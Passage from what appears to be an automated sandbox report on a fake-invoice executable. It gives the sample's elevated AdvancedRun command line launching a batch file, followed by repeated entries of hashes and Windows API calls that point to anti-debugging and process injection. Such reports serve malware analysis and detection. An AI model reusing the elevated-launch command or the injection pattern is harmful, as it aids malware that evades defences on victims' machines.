                                                                                                                                                                Commandline:'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:91000 bytes
                                                                                                                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 3%, Metadefender, Browse
                                                                                                                                                                • Detection: 0%, ReversingLabs

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Disassembly

                                                                                                                                                                Code Analysis

                                                                                                                                                                Reset < >

                                                                                                                                                                  Analysis Process: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604 Parent PID: 5776 CN-Invoice-XXXXX9808-19011143287990.exeCOMMON

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 08370040, Relevance: 45.0, Strings: 20, Instructions: 20001COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.534990519.0000000008370000.00000040.00000001.sdmp, Offset: 08370000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Dclu\rs\C$clu\rs\C$etocsZzFxsnha ati tinrtnceirrE$mcDclu\rs\C$nmcDclu\rs\C$tocsZzFxsnha ati tinrtnceirrE$u\rs\C$Zgl$Zgl$Zgl$Zgl$Zgl$Zgl$Zgl$Zgl$Zgl$Zgl$Zgl$Zgl$Zgl
                                                                                                                                                                  • API String ID: 0-185745398
                                                                                                                                                                  • Opcode ID: ca3ce3702e7b4e8358a3d57f3ffb52943548a538b243348b93ec2185d379e7d5
                                                                                                                                                                  • Instruction ID: 500bcf38c5073d75c8141d02905e7ebe24d4487dbd0dcea1c9abf55abe6478f3
                                                                                                                                                                  • Opcode Fuzzy Hash: ca3ce3702e7b4e8358a3d57f3ffb52943548a538b243348b93ec2185d379e7d5
                                                                                                                                                                  • Instruction Fuzzy Hash: 11B45170925214CFCB24DF44CA88A98B7F2AF91347F96D0DAD4185F222E772D989CF49
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 08398EB0, Relevance: 5.8, Strings: 3, Instructions: 2049COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.534990519.0000000008370000.00000040.00000001.sdmp, Offset: 08370000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: .st}{ mnlFX/$/"a.st}{ mnlFX/$Zgl
                                                                                                                                                                  • API String ID: 0-1039914291
                                                                                                                                                                  • Opcode ID: 1cbc35ac11c1a7ee3e3540e97db66e42fb0ed85346c3f3b053cae56f9615752b
                                                                                                                                                                  • Instruction ID: fd126d2ccc34ceaf8df5e883514758860bd4d478c2cf91472f6fbca5d0cea89a
                                                                                                                                                                  • Opcode Fuzzy Hash: 1cbc35ac11c1a7ee3e3540e97db66e42fb0ed85346c3f3b053cae56f9615752b
                                                                                                                                                                  • Instruction Fuzzy Hash: E3037D54E25260CCDB358F83F29C96DAAA3AFC9355F17959FC0940F636E3B58188834B
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 08398EA1, Relevance: 5.8, Strings: 3, Instructions: 2039COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.534990519.0000000008370000.00000040.00000001.sdmp, Offset: 08370000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: .st}{ mnlFX/$/"a.st}{ mnlFX/$Zgl
                                                                                                                                                                  • API String ID: 0-1039914291
                                                                                                                                                                  • Opcode ID: 672f1d1763292bde7eff1c8fc2721c0d46211271418de2df069c6557ee54f859
                                                                                                                                                                  • Instruction ID: 2772a43e2b1855c091b7cd2a26c9401e5208df9f6cb961022b023414d50a27dc
                                                                                                                                                                  • Opcode Fuzzy Hash: 672f1d1763292bde7eff1c8fc2721c0d46211271418de2df069c6557ee54f859
                                                                                                                                                                  • Instruction Fuzzy Hash: 42037D54E25260CCDB358F83F29C96DAAA3AFC9355F17959FC0940F636E3B58188834B
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0839F13B, Relevance: 1.6, APIs: 1, Instructions: 90nativethreadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,0839F0B7,00000000,00000000), ref: 0839F208
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.534990519.0000000008370000.00000040.00000001.sdmp, Offset: 08370000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InformationThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4046476035-0
                                                                                                                                                                  • Opcode ID: 363b235affa2ccf8e24fc157614729f573b9d87536dae17073f3edb539f9cd4c
                                                                                                                                                                  • Instruction ID: 28cd5d4316f4988e2ce5fb2907766b8a69ade56792b26679eb7984a95de442c8
                                                                                                                                                                  • Opcode Fuzzy Hash: 363b235affa2ccf8e24fc157614729f573b9d87536dae17073f3edb539f9cd4c
                                                                                                                                                                  • Instruction Fuzzy Hash: 28314679A04208CFDF14DFA9D8847DEBBF5EB88325F24842AD065F7280DB359941CBA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 08396890, Relevance: 1.6, APIs: 1, Instructions: 53nativethreadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,0839F0B7,00000000,00000000), ref: 0839F208
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.534990519.0000000008370000.00000040.00000001.sdmp, Offset: 08370000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InformationThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4046476035-0
                                                                                                                                                                  • Opcode ID: da4e4e2665b5f1d41a14da4c54124f2487d9d52c57d8f1038331b0a58f9b04d4
                                                                                                                                                                  • Instruction ID: 0c9da00e7794b5d3569fff3d5e190b9e09f63f88b2a7a76affceba955762f7ef
                                                                                                                                                                  • Opcode Fuzzy Hash: da4e4e2665b5f1d41a14da4c54124f2487d9d52c57d8f1038331b0a58f9b04d4
                                                                                                                                                                  • Instruction Fuzzy Hash: 691134B59046489FCB10DF9AD884BDFBBF4EB88324F108419E568A7210D774A944CFA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0839F198, Relevance: 1.6, APIs: 1, Instructions: 52nativethreadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,0839F0B7,00000000,00000000), ref: 0839F208
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.534990519.0000000008370000.00000040.00000001.sdmp, Offset: 08370000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InformationThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4046476035-0
                                                                                                                                                                  • Opcode ID: 414db0732fdd3cf66a235cb60817701198053770d5686815e76b4a398c4d88d7
                                                                                                                                                                  • Instruction ID: f044b9238d9d15688655581fca2cfedffa798b0a6bf4ce2ef92d406631188ce2
                                                                                                                                                                  • Opcode Fuzzy Hash: 414db0732fdd3cf66a235cb60817701198053770d5686815e76b4a398c4d88d7
                                                                                                                                                                  • Instruction Fuzzy Hash: D91137B59042489FCB10DF99D884BCFBBF4FB88324F108419E568A7200D778A945CFA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 008BCF8C, Relevance: .2, Instructions: 233COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.467275679.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                  • Opcode ID: 823c674f2c5da5159bd45646faae636efec4a35f35b4618fd0228d84084b7836
                                                                                                                                                                  • Instruction ID: 061ce60b131a42fb8e0caa2adc9ee3f08d47b43737953e197dbab570a6064e41
                                                                                                                                                                  • Opcode Fuzzy Hash: 823c674f2c5da5159bd45646faae636efec4a35f35b4618fd0228d84084b7836
                                                                                                                                                                  • Instruction Fuzzy Hash: 94918E34E003198FCB04DBA4DD549DDBBBAFF89304F148226E515EB7A5EB70A989CB50
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 008BCF80, Relevance: .2, Instructions: 200COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.467275679.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                  • Opcode ID: 287232110e1e626db0b5ddd45db25e12fcceb671f0589acb51d8c5a9a58bf2dc
                                                                                                                                                                  • Instruction ID: fb7ad4a1acbb82cfa83558c46af41fea4dfcb0f7daac93dc94fcccd17fc4ae99
                                                                                                                                                                  • Opcode Fuzzy Hash: 287232110e1e626db0b5ddd45db25e12fcceb671f0589acb51d8c5a9a58bf2dc
                                                                                                                                                                  • Instruction Fuzzy Hash: AF816C35E003198FCB04DBE0DD548DDBBBAFF89314F148226E515AB7A5EB30A989CB50
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 008BF030, Relevance: .2, Instructions: 200COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.467275679.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                  • Opcode ID: 44b2fe062da1ba2cc1335de51eedeec1046e78e125593b1cf65c54ba1784c14a
                                                                                                                                                                  • Instruction ID: 2135f3b60c348e34e68dd0b2037d37e100682ddfdabcfd124d62b3c7be60c81f
                                                                                                                                                                  • Opcode Fuzzy Hash: 44b2fe062da1ba2cc1335de51eedeec1046e78e125593b1cf65c54ba1784c14a
                                                                                                                                                                  • Instruction Fuzzy Hash: 17816E35E003198FCB04DFE0DD548DDBBBAFF89314B148226E515AB7A5EB70A989CB50
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 008B3518, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 008B3588
                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 008B35C5
                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 008B3602
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 008B365B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.467275679.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                                  • String ID: `{X
                                                                                                                                                                  • API String ID: 2063062207-518876105
                                                                                                                                                                  • Opcode ID: 19bd916b8e01ee1c99de4fd4e746ce601a32a90eb31af8c6552630a13e215abf
                                                                                                                                                                  • Instruction ID: 31f1b4f8de95d6f13cae5ded6918ef7a3621177377baa0c55f414ed2b4d27028
                                                                                                                                                                  • Opcode Fuzzy Hash: 19bd916b8e01ee1c99de4fd4e746ce601a32a90eb31af8c6552630a13e215abf
                                                                                                                                                                  • Instruction Fuzzy Hash: 195177B09007498FDB10CFA9C888BDEBBF0FF49314F24816AE519A7361D7749948CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 008B3528, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 008B3588
                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 008B35C5
                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 008B3602
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 008B365B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.467275679.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                                  • String ID: `{X
                                                                                                                                                                  • API String ID: 2063062207-518876105
                                                                                                                                                                  • Opcode ID: 534a9d5c5af40413e23c749940b2753beaabae41d9c775b76a6f15c72ab7abec
                                                                                                                                                                  • Instruction ID: afa5d5d003fca977f16c7c714552b639a4157e69603e058c4aafa67a49fcad96
                                                                                                                                                                  • Opcode Fuzzy Hash: 534a9d5c5af40413e23c749940b2753beaabae41d9c775b76a6f15c72ab7abec
                                                                                                                                                                  • Instruction Fuzzy Hash: 085165B09007498FDB10CFA9C888BDEBBF0FF49318F24816AE119A7361D7749948CB65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 008B9B28, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 008B9B9D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.467275679.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                  • String ID: `{X
                                                                                                                                                                  • API String ID: 2492992576-518876105
                                                                                                                                                                  • Opcode ID: 4cb036ddfe67bd8cbc7267df400c94d9641c14533e0e857c0106fd9b4f42ae88
                                                                                                                                                                  • Instruction ID: 0240bf7b1f762106a60cf16a29d94451b718da00bb1d9f2e988d7420ee1d62dc
                                                                                                                                                                  • Opcode Fuzzy Hash: 4cb036ddfe67bd8cbc7267df400c94d9641c14533e0e857c0106fd9b4f42ae88
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A119A71805794CEDB10CF99D8047EABFF4FB1A314F1481ABD594A7682C7789A08CBA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 008B9B38, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 008B9B9D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.467275679.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                  • String ID: `{X
                                                                                                                                                                  • API String ID: 2492992576-518876105
                                                                                                                                                                  • Opcode ID: ff065fdde36b0e7b82389f10c4362ac9eaf4a3078d12a3bd353bff2cd658eb92
                                                                                                                                                                  • Instruction ID: 53ddd09a206e8f1464353b792a583ad1d5b13d594fb32d8e71aeeb7252e7091b
                                                                                                                                                                  • Opcode Fuzzy Hash: ff065fdde36b0e7b82389f10c4362ac9eaf4a3078d12a3bd353bff2cd658eb92
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D118871801798CECB10CF9AD8047EEBFF8FB09324F14806AD594A3741C7789A08CBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00A62A3C, Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00A62C7E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.468532659.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                                  • Opcode ID: 293235c2398faf102fb09d4928cc58ebd95e3eebbc7ce7354def85ec29b100a0
                                                                                                                                                                  • Instruction ID: ecb67aa0bd3ca4ccd22e61015e7d70717549f5def9ef04c8047828f27293ead9
                                                                                                                                                                  • Opcode Fuzzy Hash: 293235c2398faf102fb09d4928cc58ebd95e3eebbc7ce7354def85ec29b100a0
                                                                                                                                                                  • Instruction Fuzzy Hash: F4A14671D00659CFDB24CF68C881BEEBBB2FF48314F1585A9E819A7280DB749985CF91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00A62A48, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00A62C7E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.468532659.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                                  • Opcode ID: 78c5d682fd203e985289f954a7848cda49ffbd2b29897aa98cef92a3be92c679
                                                                                                                                                                  • Instruction ID: fec7e6ae7c6474559a8baf5246032cdf1cb3f026e8341664c5016a9c5311b766
                                                                                                                                                                  • Opcode Fuzzy Hash: 78c5d682fd203e985289f954a7848cda49ffbd2b29897aa98cef92a3be92c679
                                                                                                                                                                  • Instruction Fuzzy Hash: 1B913671D00619CFDB24CF69C881BEEBBB2FF48314F1585A9E819A7280DB749985CF91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00A63F38, Relevance: 1.7, APIs: 1, Instructions: 230COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00A63F91
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.468532659.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DispatcherExceptionUser
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 6842923-0
                                                                                                                                                                  • Opcode ID: 652db31e268fcd56258590bdbb74ff2787e22a2fb977672c93e3540826035c61
                                                                                                                                                                  • Instruction ID: bc413d1c6832fdf6b5ebf33fde3bef36598e98034dadb6e204c720c5e01e4c14
                                                                                                                                                                  • Opcode Fuzzy Hash: 652db31e268fcd56258590bdbb74ff2787e22a2fb977672c93e3540826035c61
                                                                                                                                                                  • Instruction Fuzzy Hash: 41A12870E0410ACBDB58DFB9D499BDCBBB1FF88359F298519E011AB390D7399885CB24
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 008BC870, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.467275679.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                  • Opcode ID: e392f4531ce746ed9232af0ce766dc8cbdf0ec4b99a758edcbcf324a7fe5bce9
                                                                                                                                                                  • Instruction ID: 1caa97905a848a0a7c3a990bd4ad54e7e470d05371dbdd1a0ce9a17b2b679739
                                                                                                                                                                  • Opcode Fuzzy Hash: e392f4531ce746ed9232af0ce766dc8cbdf0ec4b99a758edcbcf324a7fe5bce9
                                                                                                                                                                  • Instruction Fuzzy Hash: FF712570A00B058FD724DF6AD04179ABBF1FF88354F00892AE59ADBB50D775E8098B91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00A63C68, Relevance: 1.7, APIs: 1, Instructions: 184COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.468532659.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: KernelObjectSecurity
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3015937269-0
                                                                                                                                                                  • Opcode ID: 2de80f01d9d2bf64b019c0d3bf5397a63b80095d9b84da86e2e39f2e94d906ad
                                                                                                                                                                  • Instruction ID: fa10f167e7ae3c0e640a5a0b94427392c66596dbeec520e27c0256d8f7b88447
                                                                                                                                                                  • Opcode Fuzzy Hash: 2de80f01d9d2bf64b019c0d3bf5397a63b80095d9b84da86e2e39f2e94d906ad
                                                                                                                                                                  • Instruction Fuzzy Hash: D661ABB2D042089FCF14CFA9C8456DEBFF1BF89324F158529E424A7390DB349946CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00A63F28, Relevance: 1.7, APIs: 1, Instructions: 156COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00A63F91
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.468532659.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DispatcherExceptionUser
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 6842923-0
                                                                                                                                                                  • Opcode ID: 5ae17196448cc3c1132e244eb1f9443e3a69cb2ef57da069bb35117ef63310ad
                                                                                                                                                                  • Instruction ID: 9d371f4e9721d9ea3fd2de3480a16d544d2a54850e8f7f81dd40a13d0c9f65b0
                                                                                                                                                                  • Opcode Fuzzy Hash: 5ae17196448cc3c1132e244eb1f9443e3a69cb2ef57da069bb35117ef63310ad
                                                                                                                                                                  • Instruction Fuzzy Hash: A8615970E00149CFDB58DFB9D499ADCBBB2FF88358F258619E011AB385D735A885CB24
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 008BED2D, Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 008BEE4A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.467275679.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                                                  • Opcode ID: 4bd3efd3a9c56f477540f3840e5ccf92ed404e76f4e643e5bc84a288478462e8
                                                                                                                                                                  • Instruction ID: 39e266584d09ba21a9bbb295fa35ca88d5f3e41f5902a6f4339f6aaeddda8435
                                                                                                                                                                  • Opcode Fuzzy Hash: 4bd3efd3a9c56f477540f3840e5ccf92ed404e76f4e643e5bc84a288478462e8
                                                                                                                                                                  • Instruction Fuzzy Hash: 0151B0B1D00259DFDF14CFA9C884ADEBBB1FF88314F25822AE419AB250D7749985CF90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 008BED38, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 008BEE4A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.467275679.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                                                  • Opcode ID: 01c4c11e3e219540a6bce85077582e512ef3e0ea52aa74435d868876ac2a2ad9
                                                                                                                                                                  • Instruction ID: 993605d30939debed68f035f8c2fc7caa8dd78d8fbbbc85822ba58b77a6696fa
                                                                                                                                                                  • Opcode Fuzzy Hash: 01c4c11e3e219540a6bce85077582e512ef3e0ea52aa74435d868876ac2a2ad9
                                                                                                                                                                  • Instruction Fuzzy Hash: 8641AEB1D002599FDB14CF9AC884ADEBBB5FF88314F24812AE419AB210D7749985CF90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00A621C0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 00A62250
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.468532659.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                                  • Opcode ID: c2672176b125175ba0a11b6c41e244a57bd609f4194b2980ef12b43d79f54d35
                                                                                                                                                                  • Instruction ID: d5ae3b91585fc3fc07f921e768a31b1a7557364cf3697f2a6ce1f58810d20922
                                                                                                                                                                  • Opcode Fuzzy Hash: c2672176b125175ba0a11b6c41e244a57bd609f4194b2980ef12b43d79f54d35
                                                                                                                                                                  • Instruction Fuzzy Hash: A62136729003599FCF10CFA9C884BEEBBF5FF48314F10842AE918A7240D7789954CBA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00A61ED0, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 00A63EE6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.468532659.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: KernelObjectSecurity
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3015937269-0
                                                                                                                                                                  • Opcode ID: 756d7c90030810cf22506a094e8edc1408076bb0887199ea9799e2897c9ec724
                                                                                                                                                                  • Instruction ID: 218caaf142079c58f2a0ed9c6e5a773b441276e100cbe6bd314f34536d2d5538
                                                                                                                                                                  • Opcode Fuzzy Hash: 756d7c90030810cf22506a094e8edc1408076bb0887199ea9799e2897c9ec724
                                                                                                                                                                  • Instruction Fuzzy Hash: ED2107B29042499FCB10CF9AC485BEFBBF4EF88314F158429E519A7340D778AA45CFA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00A624AB, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00A62530
                                                                                                                                                                  Memory Dump Source
